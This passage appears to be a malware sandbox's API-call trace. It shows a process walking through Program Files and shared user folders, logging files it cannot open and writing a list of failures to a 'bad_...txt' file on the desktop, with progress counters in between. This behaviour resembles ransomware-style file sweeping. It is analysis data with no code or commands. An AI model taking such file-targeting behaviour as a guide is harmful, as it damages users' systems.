denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=10165, lpMultiByteStr=0x38bca68, cbMultiByte=10165, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Portable Devices\\regulations_consensus_score.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\n­ä¸M\"÷v\x8b^\x9cN^ºVä®\x15¶\x8eb\x81 ±\x01\x1b}\x81ÕafuÄZß\x13\x11¬>Ãa \x91;ý\x86,¨v\x1b­\x8fz\x07Ï\x10c\x06¬+SH\x82ñÂS8³&ÜIF\x09.ç", lpUsedDefaultChar=0x0) returned 10165 [0265.703] WriteFile (in: hFile=0x2ec, lpBuffer=0x38bca68*, nNumberOfBytesToWrite=0x27b5, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x38bca68*, lpNumberOfBytesWritten=0x63fe20*=0x27b5, lpOverlapped=0x0) returned 1 [0265.707] CloseHandle (hObject=0x2ec) returned 1 [0265.708] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=449 / B=13 / T=2891", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0265.708] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=449 / B=13 / T=2891", cchWideChar=39, lpMultiByteStr=0x1fe5514, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=449 / B=13 / T=2891", lpUsedDefaultChar=0x0) returned 39 [0265.708] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x27, lpOverlapped=0x0) returned 1 [0265.712] Sleep (dwMilliseconds=0x5dc) [0267.223] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bad_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bad_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0267.299] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\n", cchWideChar=1212, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1212 [0267.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\n", cchWideChar=1212, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1212 [0267.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\n", cchWideChar=1212, lpMultiByteStr=0x24866e8, cbMultiByte=1212, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\n\x92\x87+\x08\x16úéVôkƵÏ-ëtpÊâÆ|^n_ÿüTeÑ]\x05lÐþQ\x11£\x08Sg¤µ)\x0b¸Ø$â\x9d\x13÷\x96\x84\x94)4\x1b¹\x8bÄÊZ_X\x0fG?\x1bßOqRi'\x0cÇÄ\x08æ¶\x1e\x02\x1b|\x97éÙ®þ-Û\x04\x9b@4\rj\x05gbí)ÉHÔc\x831=\x88\x99d…~ö\x02\x1c\nµ\x80Tt`º\x97ØÝ&\x97·½è\x0cg\x11\x81\x93\x8f¿Ý\x8f>0Æ>eCBË4\x9cgõª^*Ãm­WpÀm\"6ÚâRfw#Zj&EÞï\x95Kv\x1f\x9f\x9bÞæ\x1a¾8J°²ßËèÉß\x04&#Nj\x12ß vÔá2¢lH\x87Úx}\"\x05º0äk¢\nª\x9eô\x96\x84P\x195\x9c\x18ï\x17l¯Z!¾4ý.\x03\x12¢\x93\x09\x0b¶ý\x14\x8a@úæX\x95£R0 \x8a°<¤Ò\x8fî¦\x95\n«\x07v`\x9a8²¦SQ¹ü§¿\x1e\\§Æþ\x1b\x8dÉ<\x05ç\x96ñkÅé±z9¾I\n\x9b#\x95D\x96æê\x920y", lpUsedDefaultChar=0x0) returned 1212 [0267.300] WriteFile (in: hFile=0x228, lpBuffer=0x24866e8*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x24866e8*, lpNumberOfBytesWritten=0x63fe20*=0x4bc, lpOverlapped=0x0) returned 1 [0267.317] CloseHandle (hObject=0x228) returned 1 [0267.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=479 / B=14 / T=2891", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0267.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=479 / B=14 / T=2891", cchWideChar=39, lpMultiByteStr=0x1fe5514, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=479 / B=14 / T=2891", lpUsedDefaultChar=0x0) returned 39 [0267.627] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x27, lpOverlapped=0x0) returned 1 [0267.647] Sleep (dwMilliseconds=0x5dc) [0269.154] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bad_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bad_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.396] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package 